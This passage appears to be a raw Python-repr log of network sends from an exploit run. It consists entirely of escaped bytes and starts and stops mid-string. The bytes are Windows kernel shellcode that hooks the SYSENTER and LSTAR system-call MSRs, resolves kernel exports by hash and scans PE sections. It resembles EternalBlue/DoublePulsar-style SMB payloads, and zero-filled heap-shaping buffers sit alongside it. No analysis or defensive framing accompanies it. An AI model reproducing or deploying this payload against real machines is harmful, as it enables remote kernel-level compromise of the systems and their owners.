ff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 4, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8